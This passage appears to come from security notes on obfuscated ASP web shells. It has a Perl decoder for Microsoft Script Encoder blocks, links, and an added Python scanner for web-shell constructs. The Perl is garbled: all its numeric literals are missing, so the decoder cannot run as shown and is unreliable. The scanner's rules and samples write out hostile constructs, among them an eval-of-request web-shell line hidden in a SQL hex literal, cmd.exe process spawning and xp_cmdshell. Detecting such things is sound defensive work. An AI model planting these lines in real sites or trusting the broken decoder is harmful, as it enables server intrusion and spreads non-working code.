# by Andreas Marx <amarx [at] gega-it>, dated Sep
# http://lists.netsys.com/pipermail/full-disclosure/2003-September/010155.html
#
# See also:
# http://www.saltstorm.net/lib-soya/examples/Soya.Encode.ScriptDecoder.wbm
# http://www.saltstorm.net/lib-soya/Soya/Encode/ScriptDecoder.js
# http://www.virtualconspiracy.com/scrdec.html
# http://www.virtualconspiracy.com/download/scrdec14.c
# http://www.r4k.net/dec/dec.pl

@itab = ( # table order
,,,,,,,,,,,,,,,,
,,,,,,,,,,,,,,,,
,,,,,,,,,,,,,,,,
,,,,,,,,,,,,,,,);

@dectab0 = ( # tables to decrypt
"\x00","\x01","\x02","\x03","\x04","\x05","\x06","\x07","\x08","\x57","\x0A","\x0B","\x0C","\x0D","\x0E","\x0F",
"\x10","\x11","\x12","\x13","\x14","\x15","\x16","\x17","\x18","\x19","\x1A","\x1B","\x1C","\x1D","\x1E","\x1F",
"\x2E","\x47","\x7A","\x56","\x42","\x6A","\x2F","\x26","\x49","\x41","\x34","\x32","\x5B","\x76","\x72","\x43",
"\x38","\x39","\x70","\x45","\x68","\x71","\x4F","\x09","\x62","\x44","\x23","\x75","\x3C","\x7E","\x3E","\x5E",
"\xFF","\x77","\x4A","\x61","\x5D","\x22","\x4B","\x6F","\x4E","\x3B","\x4C","\x50","\x67","\x2A","\x7D","\x74",
"\x54","\x2B","\x2D","\x2C","\x30","\x6E","\x6B","\x66","\x35","\x25","\x21","\x64","\x4D","\x52","\x63","\x3F",
"\x7B","\x78","\x29","\x28","\x73","\x59","\x33","\x7F","\x6D","\x55","\x53","\x7C","\x3A","\x5F","\x65","\x46",
"\x58","\x31","\x69","\x6C","\x5A","\x48","\x27","\x5C","\x3D","\x24","\x79","\x37","\x60","\x51","\x20","\x36");

@dectab1 = (
"\x00","\x01","\x02","\x03","\x04","\x05","\x06","\x07","\x08","\x7B","\x0A","\x0B","\x0C","\x0D","\x0E","\x0F",
"\x10","\x11","\x12","\x13","\x14","\x15","\x16","\x17","\x18","\x19","\x1A","\x1B","\x1C","\x1D","\x1E","\x1F",
"\x32","\x30","\x21","\x29","\x5B","\x38","\x33","\x3D","\x58","\x3A","\x35","\x65","\x39","\x5C","\x56","\x73",
"\x66","\x4E","\x45","\x6B","\x62","\x59","\x78","\x5E","\x7D","\x4A","\x6D","\x71","\x3C","\x60","\x3E","\x53",
"\xFF","\x42","\x27","\x48","\x72","\x75","\x31","\x37","\x4D","\x52","\x22","\x54","\x6A","\x47","\x64","\x2D",
"\x20","\x7F","\x2E","\x4C","\x5D","\x7E","\x6C","\x6F","\x79","\x74","\x43","\x26","\x76","\x25","\x24","\x2B",
"\x28","\x23","\x41","\x34","\x09","\x2A","\x44","\x3F","\x77","\x3B","\x55","\x69","\x61","\x63","\x50","\x67",
"\x51","\x49","\x4F","\x46","\x68","\x7C","\x36","\x70","\x6E","\x7A","\x2F","\x5F","\x4B","\x5A","\x2C","\x57");

@dectab2 = (
"\x00","\x01","\x02","\x03","\x04","\x05","\x06","\x07","\x08","\x6E","\x0A","\x0B","\x0C","\x06","\x0E","\x0F",
"\x10","\x11","\x12","\x13","\x14","\x15","\x16","\x17","\x18","\x19","\x1A","\x1B","\x1C","\x1D","\x1E","\x1F",
"\x2D","\x75","\x52","\x60","\x71","\x5E","\x49","\x5C","\x62","\x7D","\x29","\x36","\x20","\x7C","\x7A","\x7F",
"\x6B","\x63","\x33","\x2B","\x68","\x51","\x66","\x76","\x31","\x64","\x54","\x43","\x3C","\x3A","\x3E","\x7E",
"\xFF","\x45","\x2C","\x2A","\x74","\x27","\x37","\x44","\x79","\x59","\x2F","\x6F","\x26","\x72","\x6A","\x39",
"\x7B","\x3F","\x38","\x77","\x67","\x53","\x47","\x34","\x78","\x5D","\x30","\x23","\x5A","\x5B","\x6C","\x48",
"\x55","\x70","\x69","\x2E","\x4C","\x21","\x24","\x4E","\x50","\x09","\x56","\x73","\x35","\x61","\x4B","\x58",
"\x3B","\x57","\x22","\x6D","\x4D","\x25","\x28","\x46","\x4A","\x32","\x41","\x3D","\x5F","\x4F","\x42","\x65");

$_ = join('', <>);
(m/\Q#@~^\E/ and $_ = $') or die "Start marker not found\n";
(m/\Q^#~@\E/ and $_ = $`) or die "End marker not found\n";
# We do not check leading checksum. Is trailing checksum always present?
(m/^[A-Za-z0-+\/]{}==/ and $_ = $') or die "No leading checksum\n";
(m/[A-Za-z0-+\/]{}==$/ and $_ = $`); # or die "No trailing checksum\n";

$pos = ; # decrypt encrypted block
$special = ;

foreach (split //) {
if ($special) {
$special = ;
tr/&#!*$/\n\r<>@/;
}
elsif ($_ lt "\x80") { # encrypted?
if ($itab[$pos] == ) { $_ = $dectab0[ord($_)]; }
elsif ($itab[$pos] == ) { $_ = $dectab1[ord($_)]; }
elsif ($itab[$pos] == ) { $_ = $dectab2[ord($_)]; }
if ($_ eq "\xff") {
$special = ;
next;
}
}
print;
$pos = ($pos+)%;
}

Relevant Link:

http://dennisbabkin.com/screnc/
http://blog.csdn.net/prsniper/article/details/5447675
http://www.password-crackers.com/crack/scrdec.html
http://download.aprilgreendownload.com/lp7_750/query.php?q=vbscript+encoder+download&ti1=12767882&ti2=0&ti3=2016-01-12T08%3A12%3A46.786244%2B00%3A00
http://www.gossamer-threads.com/lists/fulldisc/full-disclosure/29670
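
For defenders, an added example (not from the original post or any of the linked projects): a small Python triage scanner that flags the constructs visible in the samples above, including Script Encoder blocks, eval-of-request one-liners, shell processes started from page code, SQL Server OS-execution procedures, and script hidden inside SQL hex literals. The rule names and sample strings are constructed for illustration, and the encoder header shape (six base64 characters followed by `==`) is an assumption about the Script Encoder format.

```python
"""Static triage for classic ASP / ASPX source (added example, not from the page)."""
import re
from typing import Iterator, List, NamedTuple, Tuple


class Finding(NamedTuple):
    rule: str     # hypothetical rule name
    line: int     # 1-based line number in the scanned text
    excerpt: str  # start of the matching text, whitespace-normalised


# Context required before a bare "cmd.exe" counts: a process-spawning API nearby.
PROCESS_API = re.compile(r"\bProcess(?:StartInfo)?\b|wscript\.shell", re.I)

# (rule name, pattern, context that must also occur in the same text, or None)
RULES = [
    ("SCRIPT_ENCODER_BLOCK", re.compile(r"#@~\^[A-Za-z0-9+/]{6}=="), None),
    ("SCRIPT_ENCODER_LANG", re.compile(r"(?:vbscript|jscript)\.encode", re.I), None),
    ("EVAL_OF_REQUEST",
     re.compile(r"\b(?:execute|eval)\s*\(?\s*request\s*\(", re.I), None),
    ("SHELL_PROCESS", re.compile(r"\b(?:cmd|powershell)\.exe\b", re.I), PROCESS_API),
    ("PS_POLICY_BYPASS", re.compile(r"-executionpolicy\s+bypass", re.I), None),
    ("MSSQL_OS_EXEC",
     re.compile(r"\b(?:xp_cmdshell|sp_oacreate|sp_oamethod|sp_makewebtask)\b", re.I), None),
    ("BACKUP_TO_DISK",
     re.compile(r"\bbackup\s+(?:database|log)\b.{0,80}?\bto\s+disk\b", re.I), None),
]

# SQL-style hex literal of at least 8 bytes, e.g. values(0x3C25...)
HEX_LITERAL = re.compile(r"\b0x((?:[0-9A-Fa-f]{2}){8,})")


def _hits(text: str) -> Iterator[Tuple[str, "re.Match"]]:
    """Yield (rule, match) for each rule hit whose context requirement is met."""
    for rule, pattern, context in RULES:
        if context is not None and not context.search(text):
            continue
        for match in pattern.finditer(text):
            yield rule, match


def _excerpt(text: str, width: int = 60) -> str:
    return " ".join(text[:width].split())


def _line_of(text: str, offset: int) -> int:
    return text.count("\n", 0, offset) + 1


def scan_text(text: str) -> List[Finding]:
    """Scan one file's text; hex literals are decoded and scanned a second time."""
    findings = []
    for rule, match in _hits(text):
        start = match.start()
        findings.append(Finding(rule, _line_of(text, start), _excerpt(text[start:])))
    for literal in HEX_LITERAL.finditer(text):
        decoded = bytes.fromhex(literal.group(1)).decode("latin-1")
        for rule, _ in _hits(decoded):
            findings.append(
                Finding("HEX:" + rule, _line_of(text, literal.start()), _excerpt(decoded)))
    return sorted(set(findings), key=lambda f: (f.line, f.rule))


def rule_names(findings: List[Finding]) -> List[str]:
    return sorted({f.rule for f in findings})


# --- Constructed sample inputs (fragments modelled on the code shown on this page) ---
SAMPLE_ASPX = '''<%@ Page Language="C#" %>
<script runat="server">
void exec(object s, EventArgs e) {
    Process p = new Process();
    p.StartInfo.FileName = "cmd.exe";
}
</script>'''

SAMPLE_SQL = '''string sql = "insert into [bin_cmd](cmd) values(0x3C256578656375746520726571756573742822422229253E);"
 + "backup database @b to disk = @t WITH DIFFERENTIAL,FORMAT;";'''

# Placeholder body: only the markers and header shape are realistic here.
SAMPLE_ENCODED = '''<%@ LANGUAGE = VBScript.Encode %>
<%#@~^EQAAAA==PLACEHOLDER-BODYAAAAAA==^#~@%>'''

# Mentions cmd.exe in static markup only, with no process API: must stay clean.
SAMPLE_BENIGN = '''<%@ Page Language="C#" %>
<asp:Label ID="Help" runat="server" Text="See the admin guide for cmd.exe usage" />'''


if __name__ == "__main__":
    samples = [("aspx", SAMPLE_ASPX), ("sql", SAMPLE_SQL),
               ("encoded", SAMPLE_ENCODED), ("benign", SAMPLE_BENIGN)]
    for name, sample in samples:
        for finding in scan_text(sample):
            print(name, finding.rule, "line", finding.line, "|", finding.excerpt)
```

Hits are triage leads rather than verdicts: legitimate administration pages also start processes and run backups, so each flagged file still needs review against what the site is expected to contain.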

0x2: UTF-7

Relevant Link:

http://www.xuebuyuan.com/1266585.html
